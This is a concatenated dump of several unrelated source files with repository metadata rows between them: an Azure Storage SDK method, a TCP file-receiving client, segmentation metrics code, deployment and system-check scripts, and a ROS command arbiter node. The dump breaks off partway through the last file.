        api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-04-01"))  # type: Literal["2021-04-01"]
        content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None))  # type: Optional[str]
        cls = kwargs.pop("cls", None)  # type: ClsType[_models.TableServiceProperties]
        content_type = content_type or "application/json"
        # Raw IO/bytes payloads are sent as-is; model objects are serialized to JSON.
        _json = None
        _content = None
        if isinstance(parameters, (IO, bytes)):
            _content = parameters
        else:
            _json = self._serialize.body(parameters, "TableServiceProperties")
        request = build_set_service_properties_request(
            resource_group_name=resource_group_name,
            account_name=account_name,
            table_service_name=table_service_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            content_type=content_type,
            json=_json,
            content=_content,
            template_url=self.set_service_properties.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)  # type: ignore
        pipeline_response = await self._client._pipeline.run(  # type: ignore # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.CloudErrorAutoGenerated, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize("TableServiceProperties", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    set_service_properties.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/tableServices/{tableServiceName}"}  # type: ignore
    @distributed_trace_async
    async def get_service_properties(
        self, resource_group_name: str, account_name: str, table_service_name: Union[str, _models.Enum35], **kwargs: Any
    ) -> _models.TableServiceProperties:
        """Gets the properties of a storage account’s Table service, including properties for Storage
        Analytics and CORS (Cross-Origin Resource Sharing) rules.
        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive. Required.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only. Required.
        :type account_name: str
        :param table_service_name: The name of the Table Service within the specified storage account.
         Table Service Name must be 'default'. "default" Required.
        :type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: TableServiceProperties or the result of cls(response)
        :rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-04-01"))  # type: Literal["2021-04-01"]
        cls = kwargs.pop("cls", None)  # type: ClsType[_models.TableServiceProperties]
        request = build_get_service_properties_request(
            resource_group_name=resource_group_name,
            account_name=account_name,
            table_service_name=table_service_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self.get_service_properties.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)  # type: ignore
        pipeline_response = await self._client._pipeline.run(  # type: ignore # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.CloudErrorAutoGenerated, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize("TableServiceProperties", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_service_properties.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/tableServices/{tableServiceName}"}  # type: ignore
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
c0e9d9df60f11b5f2544999e5abb89e673a97ed5 | 770561db2432c67d9da4ef00fdb6ff00293a67a6 | /client2.py | c8e1a1988da8b960ec378fdbfb9e79ead82b0ee6 | [] | no_license | jinjinhui/secondRep | 6b48080790a6d761f2efac0e59c653a25240fff7 | 9661cabd6e0a4a7e931692372b2791fbb83403b1 | refs/heads/master | 2020-07-21T07:34:56.177925 | 2019-09-06T13:14:21 | 2019-09-06T13:14:21 | 206,778,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | from json import loads
from socket import socket
from base64 import b64decode
def main():
    """Receive a JSON-encoded file over TCP and save it under D:/python/.

    The peer sends a JSON document of the form
    ``{"filename": ..., "filedata": <base64>}`` and closes the connection.
    """
    client = socket()
    try:
        client.connect(('192.168.0.102', 5577))
        # Collect chunks in a list and join once at the end; repeated
        # ``bytes += chunk`` is quadratic in the payload size.
        chunks = []
        data = client.recv(1024)
        while data:
            chunks.append(data)
            data = client.recv(1024)
    finally:
        # Close the socket even if connect/recv raises.
        client.close()
    jdata = b''.join(chunks).decode('utf-8')
    mydict = loads(jdata)
    filename = mydict['filename']
    filedata = mydict['filedata']
    with open('D:/python/' + filename, 'wb') as f:
        f.write(b64decode(filedata))
    print('图片已保存!')
if __name__ == '__main__':
    main()
| [
"54697065+jinjinhui@users.noreply.github.com"
] | 54697065+jinjinhui@users.noreply.github.com |
d5aa3876187ba82b50278ce252f8cdd1d0394950 | b1f9ac3ef8f8203be3ec723ed247bb8bc6e58efb | /utils/metrics.py | 2c39e692db22bf70d2128463edb79ab36411d9a9 | [] | no_license | aparecidovieira/SNUNet-CD---TensorFlow | 54a783a4a591ad0427465129959c33d6211e016d | 9164054e1467bdebffebc71019330261b94815f1 | refs/heads/main | 2023-05-01T13:48:48.579183 | 2021-05-19T01:18:39 | 2021-05-19T01:18:39 | 364,181,060 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,509 | py | import numpy as np
import cv2, shutil, os
from glob import glob
from . import data_loader as dl
import numpy as np
def get_labels(img, _type=True):
    """Convert an RGB color-coded label image to a single-channel class mask.

    Black maps to class 0; green and white both map to class 1 (change).

    :param img: HxWx3 uint8 RGB image.
    :param _type: unused; kept for backward compatibility with existing callers.
    :return: HxWx1 uint8 mask of class indices.
    """
    colors = {(0, 0, 0): 0, (0, 255, 0): 1, (255, 255, 255): 1}
    h, w = img.shape[:2]
    mask = np.zeros((h, w), dtype=np.uint8)
    for color, value in colors.items():
        # Boolean mask of pixels exactly matching this color.
        indexes = np.all(img == np.array(color).reshape(1, 1, 3), axis=2)
        mask[indexes] = value
    mask = np.expand_dims(mask, axis=-1)
    return mask
def change_labels(img):
    """Render a single-channel class mask back into an RGB image.

    Class 0 becomes black, class 1 becomes white. The original implementation
    *overwrote* the whole channel on every loop iteration, which only worked
    because class 0's color is black; this version accumulates each class's
    contribution so additional (non-black) colors could be added safely.

    :param img: HxW array of class indices.
    :return: HxWx3 float array with the color-coded image.
    """
    h, w = img.shape[:2]
    colors = [(0, 0, 0), (255, 255, 255)]
    seg_img = np.zeros((h, w, 3))
    for value, color in enumerate(colors):
        class_mask = (img[:, :] == value)
        for channel in range(3):
            seg_img[:, :, channel] += (class_mask * color[channel]).astype('uint8')
    return seg_img
def get_image(path_img, masks=False):
    """Load an image from disk as RGB.

    When ``masks`` is True, the left HxH square of the image is interpreted as
    a color-coded label map and converted with :func:`get_labels`; otherwise
    the full image is returned normalized to [0, 1] floats.
    """
    bgr = cv2.imread(path_img, -1)
    rgb = cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB)
    h, w = rgb.shape[:2]
    if masks:
        return get_labels(rgb[:, :h, :])
    return np.float32(rgb) / 255.0
def get_IoU(y_pred, y_true, _class):
    """Return the (tp, fn, fp, tn) pixel counts for one class label."""
    pred_hit = y_pred == _class
    true_hit = y_true == _class
    tp = np.count_nonzero(np.logical_and(pred_hit, true_hit))
    fp = np.count_nonzero(np.logical_and(pred_hit, np.logical_not(true_hit)))
    tn = np.count_nonzero(np.logical_and(np.logical_not(pred_hit), np.logical_not(true_hit)))
    fn = np.count_nonzero(np.logical_and(np.logical_not(pred_hit), true_hit))
    return (tp, fn, fp, tn)
def calculate_Iou(tp, fp, fn):
    """Intersection-over-union TP / (TP + FP + FN); 0 when the denominator is 0."""
    denominator = sum(tp) + sum(fp) + sum(fn)
    if denominator == 0:
        return 0
    return float(sum(tp)) / denominator
def calculate_pixelAcc(tp, fn):
    """Pixel accuracy TP / (TP + FN); 0 when the denominator is 0."""
    denominator = sum(tp) + sum(fn)
    if denominator == 0:
        return 0
    return float(sum(tp)) / denominator
def calculateIoUEpoch(model, inputs_vals, checkpoint_dir, epoch_number):
    """Run validation for one epoch: compute IoU / pixel accuracy and save
    side-by-side (input | ground truth | prediction) images.

    :param model: Keras-style model exposing ``predict`` — TODO confirm.
    :param inputs_vals: glob prefix of the validation image directory.
    :param checkpoint_dir: directory under which epoch visualizations are written.
    :param epoch_number: used to name the output subdirectory.
    :return: (bg_iou, class_iou, bg_acc, class_acc), each in percent.
    """
    val_files = [imgPath for imgPath in glob(inputs_vals + '*')][:]
    print('Files for validation : ', len(val_files))
    os.makedirs(checkpoint_dir, exist_ok=True)
    classes = np.array([0, 1])
    save_path = "%s/epoch/%s/" % (checkpoint_dir, epoch_number)
    os.makedirs(save_path, exist_ok=True)
    # Bug fix: these accumulators were previously re-initialized inside the
    # loop, so the reported metrics covered only the LAST validation image.
    bg_out, class_out = [], []
    for filename in val_files:
        name = os.path.basename(filename)
        input_image = get_image(filename)
        mask = get_image(filename.replace('val/', 'val_labels/'), masks=True)[:, :, 0].astype(int)
        pred = model.predict(np.expand_dims(input_image, axis=0), batch_size=None, verbose=0, steps=None)
        # Threshold the sigmoid output to a binary class map.
        pred = np.round(pred[0, :, :, 0]).astype(int)
        for _class in classes:
            out = get_IoU(pred, mask, _class)
            if _class == 0:
                bg_out.append(out)
            else:
                class_out.append(out)
        # Save input | ground-truth | prediction side by side for inspection.
        pred, mask = change_labels(pred), change_labels(mask)
        img_out = np.concatenate((input_image * 255, mask, pred), axis=1)
        cv2.imwrite(save_path + name, img_out)
    # Columns follow get_IoU's return order: (tp, fn, fp, tn).
    class_out = np.array(class_out)
    TP, FN, FP, TN = [list(class_out[:, i]) for i in range(4)]
    class_iou = 100 * calculate_Iou(TP, FP, FN)
    class_acc = 100 * calculate_pixelAcc(TP, FN)
    bg_out = np.array(bg_out)
    TP, FN, FP, TN = [list(bg_out[:, i]) for i in range(4)]
    bg_iou = 100 * calculate_Iou(TP, FP, FN)
    bg_acc = 100 * calculate_pixelAcc(TP, FN)
    return bg_iou, class_iou, bg_acc, class_acc
"noreply@github.com"
] | aparecidovieira.noreply@github.com |
378150e1caf3fcaefdb2de1f6c8fe81288dfab48 | 8d3782a43521308f01748b3f6af8f45a6a17fa22 | /finalExamSandbox.py | 9dac555d939d82273dc352bf0c49211bdd6298de | [] | no_license | smurphy2230/csc-121-lesson14 | 34f3df11719a86c070dc855e43b8ba14a1e77163 | 13d5427aa4208ea4a057a6b6f74b790ee2d50c5b | refs/heads/master | 2022-07-04T16:50:19.747170 | 2020-05-07T20:03:32 | 2020-05-07T20:03:32 | 261,754,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | import random
# Draw ten random integers in [10, 20] and print only those above 15.
for _ in range(10):
    value = random.randint(10, 20)
    if value <= 15:
        continue
    print(value)
| [
"smurphy2230@gmail.com"
] | smurphy2230@gmail.com |
c7e0b7f1d1b7eca1a2eae88ea93db3e320a5d760 | 6ecde240069d771023abf3810293221da7a4839a | /check_system.py | fc27302e4bd989205a43e69118a702b5fbc38c47 | [
"BSD-3-Clause"
] | permissive | JoseAlanis/supplementary_dpx_tt | 91c91038857fd05030f302cbfb881dbd0753c6e1 | 2b5a94c35753dc9dbf51357c840a87380e40fe3c | refs/heads/master | 2021-08-16T15:16:05.341099 | 2021-04-29T09:43:18 | 2021-04-29T09:43:18 | 129,422,396 | 0 | 1 | BSD-3-Clause | 2021-04-29T09:43:19 | 2018-04-13T15:40:53 | Python | UTF-8 | Python | false | false | 1,874 | py | """
This script performs a series of checks on the system to see if everything is
ready to run the analysis pipeline.
"""
import os
import pkg_resources
from argparse import ArgumentParser
import json
import mne
from config import fname
from utils import validate_sourcedata
# Handle command line arguments
check_parser = ArgumentParser(description='Pars args for check system.')
check_parser.add_argument('-p', '--path', help='Path to validate.')
args = check_parser.parse_args()
parent_dir = args.path
# Check to see if the python dependencies are fulfilled.
dependencies = []
with open('./requirements.txt') as f:
for line in f:
line = line.strip()
if len(line) == 0 or line.startswith('#'):
continue
dependencies.append(line)
# This raises errors of dependencies are not met
pkg_resources.working_set.require(dependencies)
# Check that the data is present on the system
if not os.path.exists(fname.data_dir):
raise ValueError('The `data_dir` points to non-existent directory: ' +
fname.data_dir)
# Make sure the output directories exist
os.makedirs(fname.derivatives_dir, exist_ok=True)
# directories for reports
os.makedirs(fname.reports_dir, exist_ok=True)
# directories for results
os.makedirs(fname.results, exist_ok=True)
os.makedirs(fname.figures, exist_ok=True)
os.makedirs(fname.rt, exist_ok=True)
os.makedirs(fname.rois, exist_ok=True)
# prints some information about the system
mne.sys_info()
with open(fname.system_check, 'w') as f:
f.write('System check OK.')
# creates .json with results of sourcedata/ validation
data_val = validate_sourcedata(path=parent_dir, source_type=['eeg'])
with open('validator.json', 'w') as outfile:
json.dump(data_val, outfile, indent=4)
print("\nAll seems to be in order."
"\nYou can now run the entire pipeline with: python -m doit")
| [
"noreply@github.com"
] | JoseAlanis.noreply@github.com |
2107e1c8be217cbc0802fee26930472b7b05254c | 24e07b957c003478592bdd999bd0241faab749b0 | /scripts/autodeploy-url.py | a74c4331c173df03f16e94f7d1a0ca14c49dfd13 | [] | no_license | Commonjava/indy-docker | 458aa001c8d91b2fae9f9b43847f45c68f7500c4 | 204187b590e3bde99dd185ceb4486312e599d0c3 | refs/heads/master | 2020-04-15T01:38:43.422205 | 2016-06-14T21:22:50 | 2016-06-14T21:22:50 | 32,346,468 | 1 | 2 | null | 2016-06-22T20:45:24 | 2015-03-16T19:01:43 | Python | UTF-8 | Python | false | false | 7,777 | py | #!/usr/bin/python
#
# Copyright (C) 2015 John Casey (jdcasey@commonjava.org)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from lxml import objectify
from lxml import etree
import lxml
import httplib2
import os
import sys
import hashlib
import re
import shutil
from optparse import (OptionParser,BadOptionError,AmbiguousOptionError)
NAME='indy'
IMAGE='buildchimp/indy'
VERSIONFILE=os.path.join(os.environ.get('HOME'), '.autodeploy.last')
class Metadata(object):
    """Thin wrapper around a parsed maven-metadata.xml (lxml.objectify tree).

    NOTE: this file is Python 2 (print statements); keep it so.
    """
    def __init__(self, doc, verbose):
        # doc: lxml.objectify root of maven-metadata.xml
        self.xml = doc
        self.verbose = verbose
    def getLatestSnapshot(self):
        """Return the latest timestamped snapshot version string, or None."""
        timestamp = None
        build = None
        # Guard heavily: objectify elements can be falsy/empty in surprising ways.
        if self.xml.versioning["snapshot"] is not None and len(self.xml.versioning.snapshot) > 0 and self.xml.versioning.snapshot.getchildren() and len(self.xml.versioning.snapshot.getchildren()):
            if self.verbose is True:
                print(lxml.objectify.dump(self.xml.versioning.snapshot))
            # Format as a float to preserve the yyyyMMdd.HHmmss form of the
            # Maven snapshot timestamp (objectify parses it as a number).
            timestamp = "{ts:.6f}".format(ts=float(self.xml.versioning.snapshot.timestamp))
            build = self.xml.versioning.snapshot.buildNumber
            if self.verbose is True:
                print "Found timestamp: %s, build-number: %s" % (timestamp, build)
        version = None
        if timestamp is not None and len(self.xml.versioning.snapshotVersions) and self.xml.versioning.snapshotVersions.getchildren():
            # A concrete snapshot version ends with "<timestamp>-<build>".
            suffix = "%s-%s" % (timestamp, build)
            if self.verbose is True:
                print "Searching for version ending with: %s" % suffix
            for v in self.xml.versioning.snapshotVersions['snapshotVersion']:
                if v.getchildren():
                    ver = str(v.value)
                    if ver.endswith(suffix):
                        version = ver
                        break
        if self.verbose is True:
            print "Returning latest snapshot: %s" % version
        return version
    def getLatestRelease(self):
        """Return the <release> version string, or None if absent."""
        version = None
        if self.xml.versioning.getchildren() and len(self.xml.versioning.getchildren()):
            # TODO: If this is a FloatElement or similar, the string rendering will be WRONG.
            # See snapshot timestamp above.
            version = str(self.xml.versioning.release)
        if self.verbose is True:
            print "Returning latest release: %s" % version
        return version
def run(cmd, fail=True):
print cmd
ret = os.system(cmd)
if fail and ret != 0:
print "%s (failed with code: %s)" % (cmd, ret)
sys.exit(ret)
def parse():
    """Parse command-line options; everything after the options becomes the
    init-command template used to (re)start the container.

    Returns (opts, init_cmd_template)."""
    usage = """%prog [options] <init-script> [init-options]"""
    parser = OptionParser(usage=usage)
    # Stop option parsing at the first positional argument so the init
    # script's own flags are passed through untouched.
    parser.disable_interspersed_args()
    parser.add_option('-i', '--image', help='The image to use when deploying (default: builchimp/indy)')
    parser.add_option('-n', '--name', help='The container name under which to deploy Indy volume container (default: indy)')
    parser.add_option('-N', '--noservice', action='store_true', help='Do not try to restart a systemd service')
    parser.add_option('-r', '--release', action='store_true', help='Treat the metadata as version metadata, not snapshot metadata')
    parser.add_option('-s', '--service', help='The systemd service to manage when redeploying (default: indy-server)')
    parser.add_option('-S', '--unsafe-ssl', action='store_true', help='Disable verification of SSL certificate (DANGEROUS)')
    parser.add_option('-u', '--url', help='URL to maven-metadata.xml to watch for updates')
    parser.add_option('-v', '--verbose', action='store_true', help='Turn on verbose feedback')
    parser.add_option('-V', '--versionfile', help='File to track the last deployed version of Indy')
    opts, args = parser.parse_args()
    if opts.verbose is True:
        print "Args: '%s'" % " ".join(args)
    init_cmd_template = " ".join(args)
    # Guarantee the template contains a {url} placeholder for deploy-time substitution.
    if not '{url}' in init_cmd_template:
        init_cmd_template += " --url='{url}'"
    print "Init command template:\n %s" % init_cmd_template
    return (opts, init_cmd_template)
def getMetadataVersion(opts):
disable_ssl_validation = opts.unsafe_ssl or False
http_client = httplib2.Http(disable_ssl_certificate_validation=disable_ssl_validation)
headers = {
'Accept': 'application/xml',
'Content-Type': 'application/xml',
}
if opts.verbose is True:
print "Parsing metadata at: %s" % opts.url
response,content = http_client.request(opts.url, headers=headers)
if response.status == 404:
if opts.verbose is True:
print "%s not found" % url
sys.exit(0)
elif response.status != 200:
print "GET %s failed: %s" % (path, response.status)
sys.exit(1)
if opts.verbose is True:
print "Parsing xml:\n%s" % content
doc = objectify.fromstring(content)
meta = Metadata(doc, verbose=opts.verbose)
if opts.release is True:
return meta.getLatestRelease()
else:
return meta.getLatestSnapshot()
def deploy(opts, init_cmd):
    """Stop the old container/service, pull the image, and run init_cmd.

    Service management only happens when systemctl exists, a service name was
    given, and --noservice was not passed."""
    print "Deploying: '%s'" % init_cmd
    name = opts.name or NAME
    image = opts.image or IMAGE
    if opts.noservice is not True and opts.service and os.path.exists("/bin/systemctl"):
        if opts.verbose is True:
            print "Stopping service: %s" % opts.service
        run("systemctl stop %s" % opts.service)
    if opts.verbose is True:
        print "Shutting down existing docker container"
    # fail=False: these may legitimately fail when no container exists yet.
    run("docker stop %s" % name, fail=False)
    run("docker rm %s" % name, fail=False)
    run("docker pull %s" % image, fail=False)
    if opts.verbose is True:
        print "Running init command: %s" % init_cmd
    run(init_cmd)
    if opts.noservice is not True and opts.service and os.path.exists("/bin/systemctl"):
        print "Starting service: %s" % opts.service
        run("systemctl start %s" % opts.service)
def do(opts, init_cmd_template):
    """Main flow: compare the latest metadata version with the last deployed
    one and redeploy (then record the new version) when they differ."""
    version = getMetadataVersion(opts)
    if opts.verbose is True:
        print "Version from metadata is: %s" % version
    if version is None:
        if opts.verbose is True:
            print "No versions available in metadata: %s" % opts.url
        sys.exit(0)
    versionfile = opts.versionfile or VERSIONFILE
    if opts.verbose is True:
        print "Checking last-deployed version recorded in: %s" % versionfile
    deployed_version = None
    if os.path.exists(versionfile) and os.path.isfile(versionfile):
        with open(versionfile, "r") as vf:
            deployed_version=vf.read().replace('\n', '')
    if opts.verbose is True:
        print "Last deployed version is: %s" % deployed_version
    if deployed_version is not None and version == deployed_version:
        if opts.verbose is True:
            print "No new versions available in metadata: %s (deployed version: %s, metadata version: %s)" % (opts.url, deployed_version, version)
        sys.exit(0)
    else:
        # Derive the launcher tarball URL from the metadata URL's layout:
        # release metadata lives at <artifact>/maven-metadata.xml, snapshot
        # metadata at <artifact>/<version>/maven-metadata.xml.
        base_url = os.path.dirname(opts.url)
        if opts.release is True:
            artifact_id = os.path.basename(base_url)
            url = "{base}/{version}/{artifact_id}-{version}-launcher.tar.gz".format(base=base_url, version=version, artifact_id=artifact_id)
        else:
            artifact_id = os.path.basename(os.path.dirname(base_url))
            url = "{base}/{artifact_id}-{version}-launcher.tar.gz".format(base=base_url, version=version, artifact_id=artifact_id)
        if opts.verbose is True:
            print "Deployment URL: %s" % url
        if url is not None:
            deploy(opts, init_cmd_template.format(url=url))
        # Record the version so the next run can detect "nothing new".
        with open(versionfile, "w+") as vf:
            vf.write(version)
# Entry point: parse CLI args, then run the check-and-redeploy cycle once.
if __name__ == '__main__':
    (opts, init_cmd_template) = parse()
    do(opts, init_cmd_template)
| [
"jdcasey@commonjava.org"
] | jdcasey@commonjava.org |
45eea6cdfabe5bed18934e9819c94d41559a4231 | 6475f00264529437a29081ea174eef4a7c0d0846 | /iarc_arbiter/scripts/arbiter.py | 6518843af396f23f9377ed11e17a4ba6dec17a32 | [] | no_license | SiChiTong/iarc-2017 | 2bd01803a8ab54c438b0cfdab94bd26c55c97bb3 | 5ee36f92d033f786cae0ae2bc1713cd60fb51fd7 | refs/heads/master | 2020-04-05T14:31:25.986131 | 2018-05-14T15:03:54 | 2018-05-14T15:03:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,234 | py | #!/usr/bin/env python2
from threading import Thread
import rospy
from ddynamic_reconfigure_python.ddynamic_reconfigure import DDynamicReconfigure
from geometry_msgs.msg import Twist, PoseStamped
from iarc_arbiter.msg import RegisterBehavior
from iarc_arbiter.msg import VelAlt
from std_msgs.msg import Empty, String
from tf import TransformListener
import transformers
class Arbiter:
"""
The Arbiter is a mutiplexer that reads cmd_* topics from several namespaces, converts them into
standard cmd_vel form, and forwards one of them into the global namespace.
It receives information about which behavior (namespace) should be selected from String messages
on the /arbiter/activate_behavior topic. This information comes from the planning stack.
In the future, a voting system could replace this mechanism.
The special value "zero" represents an internal behavior that stops the vehicle.
It also publishes the name of the active behavior to arbiter/active_behavior.
"""
def __init__(self):
# The Null behavior will automatically process a 0-velocity Twist at 10hz
self.null_behavior = Behavior(self.process_command, 'zero', freq=10)
self.behaviors = {'zero': self.null_behavior}
self.active_behavior_name = 'zero'
self.set_active_behavior('zero')
self.tf = TransformListener()
self.ddynrec = DDynamicReconfigure("example_dyn_rec")
# Transformers are functions capable of processing incoming data in a variety of formats.
# They are functions that take input of whatever type the topic is, and produce a transformers.Command
# object.
alt_pid = transformers.PIDAltController(self.tf, self.ddynrec)
pos_pid = transformers.PIDPosController(self.tf, self.ddynrec, alt_pid)
print pos_pid.cmd_pos
self.transformers = {
'cmd_vel': (Twist, transformers.cmd_vel),
'cmd_takeoff': (Empty, transformers.cmd_takeoff),
'cmd_land': (Empty, transformers.cmd_land),
'cmd_pos': (PoseStamped, pos_pid.cmd_pos),
'cmd_vel_alt': (VelAlt, alt_pid.cmd_vel_alt)
}
""":type : dict[str, (str, (Any) -> transformers.Command)]"""
# Subscribe to the behaviors passed as ROS parameters
starting_behaviors = rospy.get_param('~behaviors', [])
for b in starting_behaviors:
behavior = Behavior(self.process_command, b, freq=20)
behavior.subscribe(self.transformers)
self.behaviors[b] = behavior
# Secondary behaviors are filters that are always active on the Command before it is published.
# Examples include last-minute obstacle avoidance, speed limiters, or arena boundary constraints.
self.secondaries = []
self.vel_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=0)
self.takeoff_pub = rospy.Publisher('/takeoff', Empty, queue_size=0)
self.land_pub = rospy.Publisher('/land', Empty, queue_size=0)
self.debug_pub = rospy.Publisher('/arbiter/debug', String, queue_size=10)
self.active_pub = rospy.Publisher('/arbiter/active_behavior', String, queue_size=10)
self.ddynrec.add_variable("midbrain_freq", "Frequency of the main control loop for PIDs",
rospy.get_param('~midbrain_freq', 100), 1, 1000)
self.start_ddynrec()
self.null_behavior.handle_message('cmd_vel', Twist())
rospy.sleep(0.5)
rospy.Subscriber('/arbiter/register', RegisterBehavior, self.handle_register)
rospy.Subscriber('/arbiter/activate_behavior', String, self.handle_activate)
def start_ddynrec(self):
"""
Helper function to start the ddynamic reconfigure server with a callback
function that updates the self.ddynrec attribute.
"""
def callback(config, level):
"""
A callback function used to as the parameter in the ddynrec.start() function.
This custom callback function updates the state of self.ddynrec so we can
refer to its variables whenever we have access to it.
"""
rospy.loginfo("Received reconf call: " + str(config))
# Update all variables
var_names = self.ddynrec.get_variable_names()
for var_name in var_names:
self.ddynrec.__dict__[var_name] = config[var_name]
return config
self.ddynrec.start(callback)
def handle_activate(self, msg):
"""
ROS subscriber for the activate_behavior topic
:type msg: String
"""
self.set_active_behavior(msg.data)
def set_active_behavior(self, name):
"""
Sets the active behavior, if the provided name is one of the known behaviors.
:type name: str
"""
if name not in self.behaviors:
# TODO: consider automatically registering new behaviors
rospy.logerr('{} does not exist as a behavior!'.format(name))
self.set_active_behavior('zero')
if name != self.active_behavior_name:
self.active_behavior_name = name
# Stop the vehicle
self.process_command(name, 'cmd_vel', Twist())
rospy.loginfo_throttle(1.0, '{} selected as active behavior'.format(name))
def handle_register(self, req):
"""
ROS subscriber for adding a new behavior to the system.
It is recommended to publish a single latched message to this behavior when a behavior
node starts.
:type req: RegisterBehavior
"""
if req.name in self.behaviors:
rospy.logwarn("Behavior {} already exists".format(req.name))
old = self.behaviors[req.name]
old.stop()
if not req.name:
rospy.logerr("Behavior cannot be created with empty name")
return
behavior = Behavior(self.process_command, req.name, freq=self.ddynrec.midbrain_freq if req.fast else 0)
behavior.subscribe(self.transformers)
self.behaviors[req.name] = behavior
rospy.loginfo("Created behavior {}".format(behavior))
def process_command(self, behavior, topic, raw_cmd):
"""
process_command gets called after a message gets received from the currently active behavior.
:param str behavior: The name of the behavior initiating the command
:param str topic: The topic (without namespace) to which the command was sent
:type raw_cmd: ROS message
:return: success
"""
if behavior != self.active_behavior_name:
# Only messages from the active behavior are handled
return False
_, transformer = self.transformers[topic]
# Convert to a transformers.Command
cmd = transformer(raw_cmd) # type: transformers.Command
# Apply secondary behaviors
for func in self.secondaries:
cmd = func(cmd)
# Publish the result to the ROS network
if cmd.takeoff:
self.takeoff_pub.publish(Empty())
vel = Twist()
vel.linear.z = 0.5
self.vel_pub.publish(vel)
elif cmd.land:
self.land_pub.publish(Empty())
vel = Twist()
vel.linear.z = -0.5
self.vel_pub.publish(vel)
else:
self.vel_pub.publish(cmd.vel)
# Log it
self.active_pub.publish(String(behavior))
rospy.loginfo_throttle(1, "Command published by {}/{}".format(behavior, topic))
return True
def publish_debug(self):
"""
Publishes debug information to the ROS network
:return: None
"""
self.debug_pub.publish(String(str(self.behaviors)))
def run(self):
"""
Main method, publishes debug information and
:return:
"""
r = rospy.Rate(20)
while not rospy.is_shutdown():
self.publish_debug()
try:
r.sleep()
except rospy.ROSTimeMovedBackwardsException:
r = rospy.Rate(20)
class Behavior:
    """A named behavior: a set of per-behavior topic subscribers plus an
    optional daemon thread that re-delivers the most recent command at a
    fixed frequency."""

    def __init__(self, callback, name, freq=0):
        """
        :param (str, str, Any)->bool callback: The function to be called when this behavior receives a command
        :param name: The name used to refer to this elsewhere in ROS
        :param int freq: The frequency at which to automatically publish.
        If 0, publishes immediately on message reception.
        """
        self.name = name
        self.callback = callback
        self.subscribers = dict()  # type: dict[str, rospy.Subscriber]
        # Bookkeeping for the most recent message; read by the auto-publish
        # thread below and by handle_message().
        self.last_msg_time = rospy.Time(0)
        self.last_msg_topic = ''
        self.last_msg = None
        self.auto_publish = (freq != 0)
        if self.auto_publish:
            def target():
                # Re-deliver the last received message at `freq` Hz until
                # ROS shuts down or stop() clears auto_publish.
                r = rospy.Rate(freq)
                while not rospy.is_shutdown() and self.auto_publish:
                    r.sleep()
                    if self.last_msg_topic and self.last_msg:
                        self.callback(self.name, self.last_msg_topic, self.last_msg)
            self.thread = Thread(target=target)
            # Daemon thread: must not keep the process alive on exit.
            self.thread.daemon = True
            self.thread.start()
        else:
            self.thread = None

    def stop(self):
        """
        Gracefully shuts down the threads and subscribers associated with this behavior
        :return: None
        """
        # Clearing auto_publish makes the re-publish thread's loop exit.
        self.auto_publish = False
        for sub in self.subscribers.itervalues():
            sub.unregister()

    def handle_message(self, topic, msg):
        """
        Processes an incoming message from the namespace of this behavior, ultimately calling the
        callback function provided when this behavior was created.
        :param str topic: The topic (without namespace) to which the message was sent
        :param msg: The message (various ROS message types)
        :return: None
        """
        self.last_msg_time = rospy.Time.now()
        self.last_msg_topic = topic
        self.last_msg = msg
        # NOTE(review): the guard below is intentionally disabled, so the
        # callback fires on every message even for auto-publishing behaviors.
        # if not self.auto_publish:
        self.callback(self.name, topic, msg)

    def subscribe(self, topics):
        """
        Subscribes to the topics specified by transformers from the namespace.
        :param topics: map{topic name : (Type, Transformer)
